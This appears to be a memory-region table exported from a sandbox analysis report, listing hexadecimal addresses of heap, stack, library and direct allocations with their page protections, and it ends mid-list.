7FDCE000
|
direct allocation
|
page read and write
|
||
31DA000
|
heap
|
page read and write
|
||
183A000
|
heap
|
page read and write
|
||
291E000
|
stack
|
page read and write
|
||
7BFE000
|
heap
|
page read and write
|
||
3110000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
74E000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
12C000
|
stack
|
page read and write
|
||
3B60000
|
direct allocation
|
page execute and read and write
|
||
17B4000
|
heap
|
page read and write
|
||
4290000
|
direct allocation
|
page execute and read and write
|
||
5680000
|
heap
|
page execute and read and write
|
||
269C000
|
direct allocation
|
page read and write
|
||
235B000
|
direct allocation
|
page read and write
|
||
E29000
|
heap
|
page read and write
|
||
274056ED000
|
heap
|
page read and write
|
||
6B81000
|
direct allocation
|
page read and write
|
||
678A000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
3520000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
E0F000
|
heap
|
page read and write
|
||
3200000
|
direct allocation
|
page read and write
|
||
2ACE000
|
heap
|
page read and write
|
||
9FF000
|
stack
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
2AB3000
|
heap
|
page read and write
|
||
17CE000
|
heap
|
page read and write
|
||
762000
|
heap
|
page read and write
|
||
5EE000
|
unkown
|
page read and write
|
||
5F2000
|
unkown
|
page readonly
|
||
681E000
|
stack
|
page read and write
|
||
764000
|
heap
|
page read and write
|
||
4F75000
|
heap
|
page read and write
|
||
576000
|
heap
|
page read and write
|
||
61E9F000
|
unkown
|
page readonly
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
29AE000
|
heap
|
page read and write
|
||
2FDC000
|
stack
|
page read and write
|
||
67CA000
|
heap
|
page read and write
|
||
3390000
|
heap
|
page read and write
|
||
17F0000
|
heap
|
page read and write
|
||
13F0000
|
heap
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
1CE89193000
|
heap
|
page read and write
|
||
27400097000
|
heap
|
page read and write
|
||
3000000
|
trusted library allocation
|
page read and write
|
||
274056CD000
|
heap
|
page read and write
|
||
44E1000
|
direct allocation
|
page read and write
|
||
B38000
|
unkown
|
page readonly
|
||
8160000
|
trusted library allocation
|
page read and write
|
||
2B20000
|
remote allocation
|
page read and write
|
||
97000
|
stack
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
3365000
|
direct allocation
|
page read and write
|
||
4260000
|
direct allocation
|
page execute and read and write
|
||
77BD000
|
heap
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
56C1000
|
heap
|
page read and write
|
||
14A8000
|
heap
|
page read and write
|
||
522F000
|
stack
|
page read and write
|
||
50A000
|
unkown
|
page read and write
|
||
1F03FF60000
|
heap
|
page read and write
|
||
53FF000
|
stack
|
page read and write
|
||
6BB000
|
unkown
|
page readonly
|
||
770C000
|
direct allocation
|
page read and write
|
||
6B7000
|
unkown
|
page write copy
|
||
1740000
|
direct allocation
|
page read and write
|
||
2CE9000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
940000
|
heap
|
page read and write
|
||
3310000
|
direct allocation
|
page read and write
|
||
2B0C000
|
heap
|
page read and write
|
||
A7EE000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
26B8000
|
direct allocation
|
page read and write
|
||
3901000
|
heap
|
page read and write
|
||
4F00000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
36FF000
|
stack
|
page read and write
|
||
38FD000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
456C000
|
direct allocation
|
page read and write
|
||
31AC000
|
heap
|
page read and write
|
||
2DA6000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4E2F000
|
stack
|
page read and write
|
||
7FDDE000
|
direct allocation
|
page read and write
|
||
2B10000
|
heap
|
page read and write
|
||
38A0000
|
direct allocation
|
page execute and read and write
|
||
35E0000
|
direct allocation
|
page execute and read and write
|
||
338E000
|
stack
|
page read and write
|
||
16D0000
|
heap
|
page read and write
|
||
1755000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
7B54000
|
heap
|
page read and write
|
||
1B8D000
|
heap
|
page read and write
|
||
11D8000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
3F50000
|
direct allocation
|
page execute and read and write
|
||
7F4000
|
heap
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3200000
|
direct allocation
|
page read and write
|
||
19C000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
4EB0000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
1136000
|
trusted library allocation
|
page execute and read and write
|
||
2324000
|
direct allocation
|
page read and write
|
||
4F00000
|
trusted library allocation
|
page read and write
|
||
2C6F000
|
stack
|
page read and write
|
||
2B38000
|
heap
|
page read and write
|
||
3303000
|
direct allocation
|
page read and write
|
||
1CE89290000
|
remote allocation
|
page read and write
|
||
27400A01000
|
trusted library allocation
|
page read and write
|
||
4130000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2AAC000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3371000
|
direct allocation
|
page read and write
|
||
1CE89170000
|
heap
|
page read and write
|
||
2CF0000
|
heap
|
page read and write
|
||
4450000
|
direct allocation
|
page execute and read and write
|
||
538000
|
unkown
|
page readonly
|
||
34BD000
|
heap
|
page read and write
|
||
17AB000
|
heap
|
page read and write
|
||
2ADA000
|
heap
|
page read and write
|
||
314E000
|
stack
|
page read and write
|
||
27405661000
|
heap
|
page read and write
|
||
1CE891AC000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
1E0000
|
heap
|
page read and write
|
||
50D000
|
unkown
|
page write copy
|
||
7FD81000
|
direct allocation
|
page read and write
|
||
807D000
|
stack
|
page read and write
|
||
7FDE0000
|
direct allocation
|
page read and write
|
||
274013E0000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
7B82000
|
heap
|
page read and write
|
||
231D000
|
direct allocation
|
page read and write
|
||
3D70000
|
direct allocation
|
page execute and read and write
|
||
7F4000
|
heap
|
page read and write
|
||
31F0000
|
heap
|
page read and write
|
||
5FB9000
|
heap
|
page read and write
|
||
33C4000
|
direct allocation
|
page execute and read and write
|
||
A84000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
17E5000
|
heap
|
page read and write
|
||
7FE3C000
|
direct allocation
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
349B000
|
direct allocation
|
page read and write
|
||
2D9B000
|
trusted library allocation
|
page read and write
|
||
925000
|
unkown
|
page execute and read and write
|
||
34A9000
|
direct allocation
|
page read and write
|
||
346C000
|
direct allocation
|
page read and write
|
||
10F5000
|
heap
|
page read and write
|
||
5FBF000
|
heap
|
page read and write
|
||
57DD000
|
stack
|
page read and write
|
||
5F9F000
|
heap
|
page read and write
|
||
238D48F0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
44A0000
|
direct allocation
|
page read and write
|
||
33C0000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
BFD000
|
stack
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
2B03000
|
heap
|
page read and write
|
||
E31000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
31EB000
|
heap
|
page read and write
|
||
5E676FE000
|
stack
|
page read and write
|
||
A6B000
|
unkown
|
page execute and read and write
|
||
6770000
|
heap
|
page read and write
|
||
4230000
|
direct allocation
|
page execute and read and write
|
||
EF7000
|
stack
|
page read and write
|
||
663E000
|
direct allocation
|
page read and write
|
||
31B3000
|
heap
|
page read and write
|
||
76C000
|
stack
|
page read and write
|
||
981000
|
heap
|
page read and write
|
||
33C7000
|
direct allocation
|
page execute and read and write
|
||
E32000
|
heap
|
page read and write
|
||
2DA6000
|
heap
|
page read and write
|
||
E36000
|
heap
|
page read and write
|
||
172E000
|
stack
|
page read and write
|
||
32A8000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
33B6000
|
direct allocation
|
page execute and read and write
|
||
43B0000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
2B35000
|
heap
|
page read and write
|
||
2AE6000
|
heap
|
page read and write
|
||
3371000
|
direct allocation
|
page execute and read and write
|
||
3280000
|
heap
|
page read and write
|
||
3280000
|
direct allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
A54C000
|
stack
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
29B4000
|
heap
|
page read and write
|
||
61E9E000
|
unkown
|
page write copy
|
||
3F20000
|
direct allocation
|
page execute and read and write
|
||
2AE9000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
38FA000
|
heap
|
page read and write
|
||
DF1000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
305A000
|
heap
|
page read and write
|
||
1132000
|
trusted library allocation
|
page read and write
|
||
4FC000
|
stack
|
page read and write
|
||
892E77E000
|
unkown
|
page readonly
|
||
2FD7000
|
trusted library allocation
|
page read and write
|
||
27405490000
|
trusted library allocation
|
page read and write
|
||
35B0000
|
direct allocation
|
page execute and read and write
|
||
2AB3000
|
heap
|
page read and write
|
||
29C5000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2AEF000
|
heap
|
page read and write
|
||
A64D000
|
stack
|
page read and write
|
||
2399000
|
direct allocation
|
page read and write
|
||
7BA000
|
heap
|
page read and write
|
||
1460000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
769000
|
heap
|
page read and write
|
||
4591000
|
direct allocation
|
page read and write
|
||
3FD000
|
stack
|
page read and write
|
||
2C7E000
|
stack
|
page read and write
|
||
E10000
|
heap
|
page read and write
|
||
2D76000
|
heap
|
page read and write
|
||
33DF000
|
stack
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
14AE000
|
stack
|
page read and write
|
||
718000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
6785000
|
heap
|
page read and write
|
||
2B04000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
2FB8000
|
heap
|
page read and write
|
||
E26000
|
heap
|
page read and write
|
||
4160000
|
direct allocation
|
page execute and read and write
|
||
A84000
|
heap
|
page read and write
|
||
36E3000
|
direct allocation
|
page read and write
|
||
1450000
|
heap
|
page read and write
|
||
1760000
|
heap
|
page read and write
|
||
34BF000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
274054A0000
|
trusted library allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
2740007B000
|
heap
|
page read and write
|
||
31B3000
|
heap
|
page read and write
|
||
397E000
|
stack
|
page read and write
|
||
929000
|
unkown
|
page execute and read and write
|
||
8EB0000
|
trusted library allocation
|
page execute and read and write
|
||
7EC000
|
heap
|
page read and write
|
||
3970000
|
direct allocation
|
page execute and read and write
|
||
2B7D000
|
heap
|
page read and write
|
||
452B000
|
direct allocation
|
page read and write
|
||
6B1000
|
unkown
|
page read and write
|
||
29AE000
|
heap
|
page read and write
|
||
96A000
|
heap
|
page read and write
|
||
6B1000
|
unkown
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
4F79000
|
heap
|
page read and write
|
||
27401030000
|
trusted library section
|
page readonly
|
||
31C4000
|
heap
|
page read and write
|
||
4030000
|
direct allocation
|
page execute and read and write
|
||
27400090000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
31D4000
|
heap
|
page read and write
|
||
735000
|
heap
|
page read and write
|
||
61E01000
|
unkown
|
page execute read
|
||
1811000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
1CE89290000
|
remote allocation
|
page read and write
|
||
E54000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
34B8000
|
direct allocation
|
page read and write
|
||
17CE000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8E8000
|
stack
|
page read and write
|
||
2740091A000
|
heap
|
page read and write
|
||
2D9E000
|
stack
|
page read and write
|
||
5AF000
|
unkown
|
page write copy
|
||
7F4000
|
heap
|
page read and write
|
||
2678000
|
direct allocation
|
page read and write
|
||
29C8000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
38F6000
|
heap
|
page read and write
|
||
3540000
|
direct allocation
|
page execute and read and write
|
||
E1A000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4DB1000
|
heap
|
page read and write
|
||
4CAD000
|
direct allocation
|
page read and write
|
||
34C5000
|
heap
|
page read and write
|
||
323D000
|
heap
|
page read and write
|
||
4EEE000
|
stack
|
page read and write
|
||
29C1000
|
heap
|
page read and write
|
||
3378000
|
direct allocation
|
page read and write
|
||
6BA000
|
unkown
|
page write copy
|
||
29D0000
|
heap
|
page read and write
|
||
B20000
|
unkown
|
page readonly
|
||
758000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
1E6000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
1114000
|
trusted library allocation
|
page read and write
|
||
5335000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
502F000
|
stack
|
page read and write
|
||
7FD10000
|
direct allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
6AE1000
|
direct allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
E2B000
|
heap
|
page read and write
|
||
746000
|
heap
|
page read and write
|
||
787E000
|
stack
|
page read and write
|
||
753000
|
heap
|
page read and write
|
||
892F7FE000
|
stack
|
page read and write
|
||
17E1000
|
heap
|
page read and write
|
||
2E3D000
|
stack
|
page read and write
|
||
3B10000
|
direct allocation
|
page execute and read and write
|
||
27405550000
|
trusted library allocation
|
page read and write
|
||
E54000
|
heap
|
page read and write
|
||
C58000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
176B000
|
heap
|
page read and write
|
||
1B8B000
|
heap
|
page read and write
|
||
238D4920000
|
heap
|
page read and write
|
||
E3A000
|
heap
|
page read and write
|
||
94C000
|
heap
|
page read and write
|
||
9B0D000
|
stack
|
page read and write
|
||
304E000
|
stack
|
page read and write
|
||
108F000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
4F2F000
|
stack
|
page read and write
|
||
11B0000
|
heap
|
page read and write
|
||
1A6E000
|
stack
|
page read and write
|
||
4510000
|
heap
|
page read and write
|
||
36B0000
|
direct allocation
|
page execute and read and write
|
||
539F000
|
stack
|
page read and write
|
||
274053F0000
|
trusted library allocation
|
page read and write
|
||
A00000
|
heap
|
page read and write
|
||
6BA000
|
unkown
|
page write copy
|
||
2F7E000
|
trusted library allocation
|
page read and write
|
||
2D79000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
10FB000
|
heap
|
page read and write
|
||
36F1000
|
direct allocation
|
page read and write
|
||
2F8E000
|
trusted library allocation
|
page read and write
|
||
B22000
|
unkown
|
page readonly
|
||
31CE000
|
heap
|
page read and write
|
||
322E000
|
heap
|
page read and write
|
||
3432000
|
direct allocation
|
page read and write
|
||
17E1000
|
heap
|
page read and write
|
||
2CFB000
|
heap
|
page read and write
|
||
2B9F000
|
stack
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
16C000
|
stack
|
page read and write
|
||
526E000
|
stack
|
page read and write
|
||
2B00000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
3C90000
|
direct allocation
|
page execute and read and write
|
||
3A90000
|
direct allocation
|
page execute and read and write
|
||
3AD0000
|
direct allocation
|
page execute and read and write
|
||
36D4000
|
direct allocation
|
page read and write
|
||
2D40000
|
heap
|
page read and write
|
||
2ACE000
|
stack
|
page read and write
|
||
6D5D000
|
stack
|
page read and write
|
||
65E000
|
stack
|
page read and write
|
||
2740563F000
|
heap
|
page read and write
|
||
2FC0000
|
heap
|
page read and write
|
||
510000
|
heap
|
page read and write
|
||
455D000
|
direct allocation
|
page read and write
|
||
E38000
|
heap
|
page read and write
|
||
61E9B000
|
unkown
|
page read and write
|
||
E54000
|
heap
|
page read and write
|
||
7FE10000
|
direct allocation
|
page read and write
|
||
1F03FF67000
|
heap
|
page read and write
|
||
346C000
|
direct allocation
|
page read and write
|
||
3210000
|
heap
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
2B25000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2DE0000
|
heap
|
page read and write
|
||
34AA000
|
heap
|
page read and write
|
||
4F83000
|
heap
|
page read and write
|
||
651D000
|
direct allocation
|
page read and write
|
||
361000
|
unkown
|
page execute read
|
||
22A9000
|
heap
|
page read and write
|
||
3CD0000
|
direct allocation
|
page execute and read and write
|
||
4EAC54E000
|
stack
|
page read and write
|
||
6B7000
|
unkown
|
page write copy
|
||
1E7000
|
heap
|
page read and write
|
||
35D0000
|
direct allocation
|
page execute and read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
31EB000
|
heap
|
page read and write
|
||
3730000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
34C5000
|
heap
|
page read and write
|
||
E54000
|
heap
|
page read and write
|
||
38E0000
|
direct allocation
|
page execute and read and write
|
||
2CCE000
|
stack
|
page read and write
|
||
57F0000
|
heap
|
page read and write
|
||
31AF000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
42B0000
|
direct allocation
|
page execute and read and write
|
||
892E677000
|
stack
|
page read and write
|
||
E36000
|
heap
|
page read and write
|
||
31A8000
|
heap
|
page read and write
|
||
5F90000
|
heap
|
page read and write
|
||
7F5000
|
heap
|
page read and write
|
||
3050000
|
heap
|
page read and write
|
||
29C1000
|
heap
|
page read and write
|
||
44B2000
|
direct allocation
|
page read and write
|
||
76F10FC000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
17E5000
|
heap
|
page read and write
|
||
3B80000
|
direct allocation
|
page execute and read and write
|
||
35F0000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
4FE7000
|
heap
|
page read and write
|
||
23B0000
|
direct allocation
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
1CE891BC000
|
heap
|
page read and write
|
||
4F79000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
2B4B000
|
heap
|
page read and write
|
||
3DE0000
|
direct allocation
|
page execute and read and write
|
||
6C8000
|
heap
|
page read and write
|
||
463C000
|
direct allocation
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
722000
|
heap
|
page read and write
|
||
52BE000
|
stack
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
12D0000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
31E1000
|
heap
|
page read and write
|
||
29CB000
|
heap
|
page read and write
|
||
5330000
|
trusted library allocation
|
page read and write
|
||
5A1000
|
unkown
|
page read and write
|
||
2DD0000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
3950000
|
direct allocation
|
page execute and read and write
|
||
2A9F000
|
stack
|
page read and write
|
||
A7D000
|
stack
|
page read and write
|
||
892F8FE000
|
stack
|
page read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
97F000
|
stack
|
page read and write
|
||
777C000
|
stack
|
page read and write
|
||
3EE0000
|
direct allocation
|
page execute and read and write
|
||
7772000
|
heap
|
page read and write
|
||
AD0000
|
heap
|
page read and write
|
||
29C1000
|
heap
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
E13000
|
heap
|
page read and write
|
||
773000
|
heap
|
page read and write
|
||
955E000
|
stack
|
page read and write
|
||
2AE1000
|
heap
|
page read and write
|
||
273FFE90000
|
heap
|
page read and write
|
||
4340000
|
direct allocation
|
page execute and read and write
|
||
43A0000
|
direct allocation
|
page execute and read and write
|
||
2E80000
|
heap
|
page read and write
|
||
E19000
|
heap
|
page read and write
|
||
29C1000
|
heap
|
page read and write
|
||
8200000
|
trusted library allocation
|
page read and write
|
||
2590000
|
heap
|
page read and write
|
||
42C0000
|
direct allocation
|
page execute and read and write
|
||
144E000
|
stack
|
page read and write
|
||
3A20000
|
direct allocation
|
page execute and read and write
|
||
4A8E000
|
stack
|
page read and write
|
||
3900000
|
direct allocation
|
page execute and read and write
|
||
2D65000
|
heap
|
page read and write
|
||
29C5000
|
heap
|
page read and write
|
||
22A9000
|
direct allocation
|
page read and write
|
||
3890000
|
direct allocation
|
page execute and read and write
|
||
4EB0000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2B00000
|
heap
|
page read and write
|
||
892F4FE000
|
stack
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
4100000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
233A000
|
direct allocation
|
page read and write
|
||
3242000
|
heap
|
page read and write
|
||
3BE0000
|
direct allocation
|
page execute and read and write
|
||
2B39000
|
heap
|
page read and write
|
||
7C2E000
|
heap
|
page read and write
|
||
5F2000
|
unkown
|
page readonly
|
||
507E000
|
stack
|
page read and write
|
||
2DCA000
|
heap
|
page read and write
|
||
1CE89070000
|
heap
|
page read and write
|
||
7B48000
|
heap
|
page read and write
|
||
3905000
|
heap
|
page read and write
|
||
70F000
|
heap
|
page read and write
|
||
2F90000
|
heap
|
page read and write
|
||
46F000
|
heap
|
page read and write
|
||
3494000
|
direct allocation
|
page read and write
|
||
360000
|
unkown
|
page readonly
|
||
17E1000
|
heap
|
page read and write
|
||
E18000
|
heap
|
page read and write
|
||
6A5F000
|
stack
|
page read and write
|
||
8160000
|
trusted library allocation
|
page read and write
|
||
520000
|
heap
|
page read and write
|
||
3907000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
29CB000
|
heap
|
page read and write
|
||
55D000
|
stack
|
page read and write
|
||
7820000
|
trusted library allocation
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
7720000
|
trusted library allocation
|
page read and write
|
||
981000
|
heap
|
page read and write
|
||
7FE00000
|
direct allocation
|
page read and write
|
||
29AE000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
6A0000
|
heap
|
page read and write
|
||
6AC6000
|
direct allocation
|
page read and write
|
||
34B9000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
76C000
|
stack
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
1E7000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
1110000
|
trusted library allocation
|
page read and write
|
||
2694000
|
direct allocation
|
page read and write
|
||
3530000
|
direct allocation
|
page execute and read and write
|
||
4F02000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
4CA0000
|
direct allocation
|
page read and write
|
||
323C000
|
heap
|
page read and write
|
||
4F00000
|
heap
|
page read and write
|
||
4EAC5CF000
|
stack
|
page read and write
|
||
4F75000
|
heap
|
page read and write
|
||
A86000
|
unkown
|
page execute and write copy
|
||
298C000
|
heap
|
page read and write
|
||
65BD000
|
direct allocation
|
page read and write
|
||
54BE000
|
stack
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
4EC4000
|
trusted library allocation
|
page read and write
|
||
17E1000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8ED000
|
stack
|
page read and write
|
||
2AF0000
|
heap
|
page read and write
|
||
338E000
|
stack
|
page read and write
|
||
43C0000
|
direct allocation
|
page execute and read and write
|
||
E3A000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
37A6000
|
heap
|
page read and write
|
||
42D0000
|
direct allocation
|
page execute and read and write
|
||
417000
|
unkown
|
page read and write
|
||
E17000
|
heap
|
page read and write
|
||
43E0000
|
direct allocation
|
page execute and read and write
|
||
2D66000
|
heap
|
page read and write
|
||
26CE000
|
direct allocation
|
page read and write
|
||
3343000
|
direct allocation
|
page read and write
|
||
4EC2000
|
trusted library allocation
|
page read and write
|
||
2980000
|
heap
|
page read and write
|
||
9CE000
|
stack
|
page read and write
|
||
5F2000
|
unkown
|
page readonly
|
||
795E000
|
stack
|
page read and write
|
||
6776000
|
heap
|
page read and write
|
||
27400800000
|
heap
|
page read and write
|
||
274056E6000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
4574000
|
direct allocation
|
page read and write
|
||
7FD70000
|
direct allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
3C80000
|
direct allocation
|
page execute and read and write
|
||
975000
|
heap
|
page read and write
|
||
41C000
|
unkown
|
page readonly
|
||
2EEC000
|
stack
|
page read and write
|
||
1CE891AC000
|
heap
|
page read and write
|
||
4470000
|
direct allocation
|
page execute and read and write
|
||
31C4000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
8AB000
|
stack
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
3451000
|
direct allocation
|
page read and write
|
||
2DB6000
|
trusted library allocation
|
page read and write
|
||
2F96000
|
trusted library allocation
|
page read and write
|
||
2ACE000
|
heap
|
page read and write
|
||
2C3F000
|
stack
|
page read and write
|
||
3790000
|
direct allocation
|
page execute and read and write
|
||
3315000
|
direct allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
D7E000
|
stack
|
page read and write
|
||
8F5E000
|
stack
|
page read and write
|
||
76A000
|
heap
|
page read and write
|
||
18D8000
|
heap
|
page read and write
|
||
8790000
|
trusted library allocation
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
7FD0E000
|
direct allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
7F7C000
|
stack
|
page read and write
|
||
1FB3000
|
direct allocation
|
page read and write
|
||
346C000
|
direct allocation
|
page read and write
|
||
2375000
|
direct allocation
|
page read and write
|
||
4F7F000
|
heap
|
page read and write
|
||
892FC7B000
|
stack
|
page read and write
|
||
E31000
|
heap
|
page read and write
|
||
9C90000
|
trusted library allocation
|
page read and write
|
||
777000
|
heap
|
page read and write
|
||
3230000
|
heap
|
page read and write
|
||
2AB3000
|
heap
|
page read and write
|
||
37A0000
|
direct allocation
|
page execute and read and write
|
||
756000
|
heap
|
page read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
7F4000
|
heap
|
page read and write
|
||
2AE5000
|
heap
|
page read and write
|
||
AE6000
|
heap
|
page read and write
|
||
1F0000
|
heap
|
page read and write
|
||
3CA0000
|
direct allocation
|
page execute and read and write
|
||
2FCE000
|
stack
|
page read and write
|
||
E12000
|
heap
|
page read and write
|
||
8F1D000
|
stack
|
page read and write
|
||
3E30000
|
direct allocation
|
page execute and read and write
|
||
26D5000
|
direct allocation
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
6BB000
|
unkown
|
page readonly
|
||
298C000
|
heap
|
page read and write
|
||
3307000
|
direct allocation
|
page read and write
|
||
29C1000
|
heap
|
page read and write
|
||
47C000
|
heap
|
page read and write
|
||
27401010000
|
trusted library section
|
page readonly
|
||
818000
|
heap
|
page read and write
|
||
6BB000
|
unkown
|
page readonly
|
||
4F02000
|
heap
|
page read and write
|
||
17EB000
|
heap
|
page read and write
|
||
995F000
|
stack
|
page read and write
|
||
6BB000
|
unkown
|
page readonly
|
||
11D0000
|
heap
|
page read and write
|
||
5F2000
|
unkown
|
page readonly
|
||
4F7E000
|
heap
|
page read and write
|
||
E22000
|
heap
|
page read and write
|
||
40B0000
|
direct allocation
|
page execute and read and write
|
||
8130000
|
trusted library allocation
|
page read and write
|
||
11DE000
|
heap
|
page read and write
|
||
2AF9000
|
heap
|
page read and write
|
||
3AF0000
|
direct allocation
|
page execute and read and write
|
||
29C1000
|
heap
|
page read and write
|
||
E1E000
|
heap
|
page read and write
|
||
F60000
|
heap
|
page read and write
|
||
31C4000
|
heap
|
page read and write
|
||
2CF1000
|
heap
|
page read and write
|
||
3B30000
|
direct allocation
|
page execute and read and write
|
||
20C4000
|
direct allocation
|
page read and write
|
||
5683000
|
heap
|
page execute and read and write
|
||
31F2000
|
heap
|
page read and write
|
||
A84000
|
heap
|
page read and write
|
||
150000
|
stack
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
979E000
|
